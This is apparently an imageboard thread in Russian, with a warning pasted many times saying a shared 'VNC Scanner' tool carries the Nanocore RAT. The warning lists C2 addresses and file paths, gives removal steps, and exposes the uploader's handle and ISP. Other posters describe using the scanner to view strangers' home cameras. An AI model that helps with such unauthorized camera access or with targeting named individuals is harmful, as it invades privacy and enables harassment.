проверить заражены пройдитесь DrWeb CureIt или проверте сетевые подключения на наличие коннекта (Win+R→cmd→ОК→netstat -a→Enter) к таким адресам как 46.211.208.211:5555 или DrendRound.ddns.net:5555 также вы можете выявить вирус в C:\Program Files\AGP Service\agpsvc.exe .Если попытаешься убить процесс будет синий экран BSOD.Если нет LiveCD .То загрузи Unlocker Assistent и поставь удалить файл при следующей загрузке системы и перезагрузись,а так же проверь перед этим автозагрузку на наличие записи AGP Service.Как ты видишь ОП упал на жопу и ищет отмазки типа вируса нет.И пароль стоит на архиве чтобы сканеры вирусов на рыгохосте не смогли проверить файл на вирусы.E-mail опа кулхацкера [email protected] Он подписан в танках и стиме как DrendRound . Будьте внимательны ОП-хуй распространяет вирус троян RAT Nanocore.Он дает опу доступ к вашему жесткому диску,вэбкамере,микрофону,экрану и командной строке.Вирус заджойнен к exeшнику VNC Scanner.Чтобы проверить заражены пройдитесь DrWeb CureIt или проверте сетевые подключения на наличие коннекта (Win+R→cmd→ОК→netstat -a→Enter) к таким адресам как 46.211.208.211:5555 или DrendRound.ddns.net:5555 также вы можете выявить вирус в C:\Program Files\AGP Service\agpsvc.exe .Если попытаешься убить процесс будет синий экран BSOD.Если нет LiveCD .То загрузи Unlocker Assistent и поставь удалить файл при следующей загрузке системы и перезагрузись,а так же проверь перед этим автозагрузку на наличие записи AGP Service.Как ты видишь ОП упал на жопу и ищет отмазки типа вируса нет.И пароль стоит на архиве чтобы сканеры вирусов на рыгохосте не смогли проверить файл на вирусы.E-mail опа кулхацкера [email protected] Он подписан в танках и стиме как DrendRound . Будьте внимательны ОП-хуй распространяет вирус троян RAT Nanocore.Он дает опу доступ к вашему жесткому диску,вэбкамере,микрофону,экрану и командной строке.Вирус заджойнен к exeшнику VNC Scanner.Чтобы проверить заражены пройдитесь DrWeb CureIt или проверте сетевые подключения на наличие коннекта (Win+R→cmd→ОК→netstat -a→Enter) к таким адресам как 46.211.208.211:5555 или DrendRound.ddns.net:5555 также вы можете выявить вирус в C:\Program Files\AGP Service\agpsvc.exe .Если попытаешься убить процесс будет синий экран BSOD.Если нет LiveCD .То загрузи Unlocker Assistent и поставь удалить файл при следующей загрузке системы и перезагрузись,а так же проверь перед этим автозагрузку на наличие записи AGP Service.Как ты видишь ОП упал на жопу и ищет отмазки типа вируса нет.И пароль стоит на архиве чтобы сканеры вирусов на рыгохосте не смогли проверить файл на вирусы.E-mail опа кулхацкера [email protected] Он подписан в танках и стиме как DrendRound . Будьте внимательны ОП-хуй распространяет вирус троян RAT Nanocore.Он дает опу доступ к вашему жесткому диску,вэбкамере,микрофону,экрану и командной строке.Вирус заджойнен к exeшнику VNC Scanner.Чтобы проверить заражены пройдитесь DrWeb CureIt или проверте сетевые подключения на наличие коннекта (Win+R→cmd→ОК→netstat -a→Enter) к таким адресам как 46.211.208.211:5555 или DrendRound.ddns.net:5555 также вы можете выявить вирус в C:\Program Files\AGP Service\agpsvc.exe .Если попытаешься убить процесс будет синий экран BSOD.Если нет LiveCD .То загрузи Unlocker Assistent и поставь удалить файл при следующей загрузке системы и перезагрузись,а так же проверь перед этим автозагрузку на наличие записи AGP Service.Как ты видишь ОП упал на жопу и ищет отмазки типа вируса нет.И пароль стоит на архиве чтобы сканеры вирусов на рыгохосте не смогли проверить файл на вирусы.E-mail опа кулхацкера [email protected] Он подписан в танках и стиме как DrendRound . Будьте внимательны ОП-хуй распространяет вирус троян RAT Nanocore.Он дает опу доступ к вашему жесткому диску,вэбкамере,микрофону,экрану и командной строке.Вирус заджойнен к exeшнику VNC Scanner.Чтобы проверить заражены пройдитесь DrWeb CureIt или проверте сетевые подключения на наличие коннекта (Win+R→cmd→ОК→netstat -a→Enter) к таким адресам как 46.211.208.211:5555 или DrendRound.ddns.net:5555 также вы можете выявить вирус в C:\Program Files\AGP Service\agpsvc.exe .Если попытаешься убить процесс будет синий экран BSOD.Если нет LiveCD .То загрузи Unlocker Assistent и поставь удалить файл при следующей загрузке системы и перезагрузись,а так же проверь перед этим автозагрузку на наличие записи AGP Service.Как ты видишь ОП упал на жопу и ищет отмазки типа вируса нет.И пароль стоит на архиве чтобы сканеры вирусов на рыгохосте не смогли проверить файл на вирусы.E-mail опа кулхацкера [email protected] Он подписан в танках и стиме как DrendRound . Будьте внимательны ОП-хуй распространяет вирус троян RAT Nanocore.Он дает опу доступ к вашему жесткому диску,вэбкамере,микрофону,экрану и командной строке.Вирус заджойнен к exeшнику VNC Scanner.Чтобы проверить заражены пройдитесь DrWeb CureIt или проверте сетевые подключения на наличие коннекта (Win+R→cmd→ОК→netstat -a→Enter) к таким адресам как 46.211.208.211:5555 или DrendRound.ddns.net:5555 также вы можете выявить вирус в C:\Program Files\AGP Service\agpsvc.exe .Если попытаешься убить процесс будет синий экран BSOD.Если нет LiveCD .То загрузи Unlocker Assistent и поставь удалить файл при следующей загрузке системы и перезагрузись,а так же проверь перед этим автозагрузку на наличие записи AGP Service.Как ты видишь ОП упал на жопу и ищет отмазки типа вируса нет.И пароль стоит на архиве чтобы сканеры вирусов на рыгохосте не смогли проверить файл на вирусы.E-mail опа кулхацкера [email protected] Он подписан в танках и стиме как DrendRound . Будьте внимательны ОП-хуй распространяет вирус троян RAT Nanocore.Он дает опу доступ к вашему жесткому диску,вэбкамере,микрофону,экрану и командной строке.Вирус заджойнен к exeшнику VNC Scanner.Чтобы проверить заражены пройдитесь DrWeb CureIt или проверте сетевые подключения на наличие коннекта (Win+R→cmd→ОК→netstat -a→Enter) к таким адресам как 46.211.208.211:5555 или DrendRound.ddns.net:5555 также вы можете выявить вирус в C:\Program Files\AGP Service\agpsvc.exe .Если попытаешься убить процесс будет синий экран BSOD.Если нет LiveCD .То загрузи Unlocker Assistent и поставь удалить файл при следующей загрузке системы и перезагрузись,а так же проверь перед этим автозагрузку на наличие записи AGP Service.Как ты видишь ОП упал на жопу и ищет отмазки типа вируса нет.И пароль стоит на архиве чтобы сканеры вирусов на рыгохосте не смогли проверить файл на вирусы.E-mail опа кулхацкера [email protected] Он подписан в танках и стиме как DrendRound . Будьте внимательны ОП-хуй распространяет вирус троян RAT Nanocore.Он дает опу доступ к вашему жесткому диску,вэбкамере,микрофону,экрану и командной строке.Вирус заджойнен к exeшнику VNC Scanner.Чтобы проверить заражены пройдитесь DrWeb CureIt или проверте сетевые подключения на наличие коннекта (Win+R→cmd→ОК→netstat -a→Enter) к таким адресам как 46.211.208.211:5555 или DrendRound.ddns.net:5555 также вы можете выявить вирус в C:\Program Files\AGP Service\agpsvc.exe .Если попытаешься убить процесс будет синий экран BSOD.Если нет LiveCD .То загрузи Unlocker Assistent и поставь удалить файл при следующей загрузке системы и перезагрузись,а так же проверь перед этим автозагрузку на наличие записи AGP Service.Как ты видишь ОП упал на жопу и ищет отмазки типа вируса нет.И пароль стоит на архиве чтобы сканеры вирусов на рыгохосте не смогли проверить файл на вирусы.E-mail опа кулхацкера [email protected] Он подписан в танках и стиме как DrendRound . Будьте внимательны Если у кого есть вебм, где через камеру в одном из штабов украинского АТО включили песню про ДНР, то я буду очень благодарен И неужели у опа хуя не осталось золота с самого первого треда? Бля, антивирус заорал и я сразу удалил прогу, нашел в гугле чистую. На данный момент нашел только одну камеру, судя по желтым номерам, это или бриташка, дания или нидерланды. Я правильно понимаю,что только одна камера из десяти способна раздавать звук? Или я еблан,и включение музыки ВК при двусторонней передаче не робит? 1. Распаковываем архив 2. Проверяем файл на Virustotal 3. ??? 4. POSONY NE KOCHAITE TAM VIRUS PISHU S TAPKA Подтверждаю, на качайте vnc_scanner_gui из ОП-поста, берите в другом месте, ОП пидор гнойный. 6ump. Чекни на вирустотал, дауненок. И за вайп треда банят. Ты даже сагу включить не можешь. >просмотрите активные соединения где их посмотреть, гик ебаный? не все понимают в этом говне Ты зачем локальные порты и удаленные хосты затер, дурик? Боишься, что по ойпи вычислят? в чём прроблему скачать с другого места? с харкача только умственно отсталые качают. как меня заебал этот театр одного актера.Оп спрашивает и сам пишет что все нормально Вот анон чистый VNC https://drive.google.com/open?id=0B2L9jmXOTzo3aEU2TDZFeUMyTkE Запилите гайд по поиску скрытых камер на съёмной хате съезжаю через неделю Оп хохол,у него инет Киевстар можно накатать на него абуз чем я и займусь >просмотрите активные соединения ну и где мне их посмотреть? винда 10 ну вроде dr web удалил вирус правда я хз что сделать что бы наверняка Че за хакир? Чем знаменит ОП? Где посмотреть активные соединения? т.е., если я перейду по ссылку в оп-посте, то мой комп-заражен? Unlocker Assistant я не могу открыть это гавно бля Почему когда рашку в VNc выбираешь ошибку выдает? Не перестаю удивляться тому, что вы еще живы. Оставайтесь на месте, к вам уже выехали Выключай долбоёбник,мань,абуз написан Какого хуя у них в квартирах камеры? Ахахахах,пров ОПу инет перекрыл Забанят за вайп же, не тупи. 6ump. Всё. Больше нет WEbm. СОООООООУУУУУССС!!! кто такой ратник ? Хорошо.Спасибо Нормально. хы 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. Лайк! 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump. 6ump.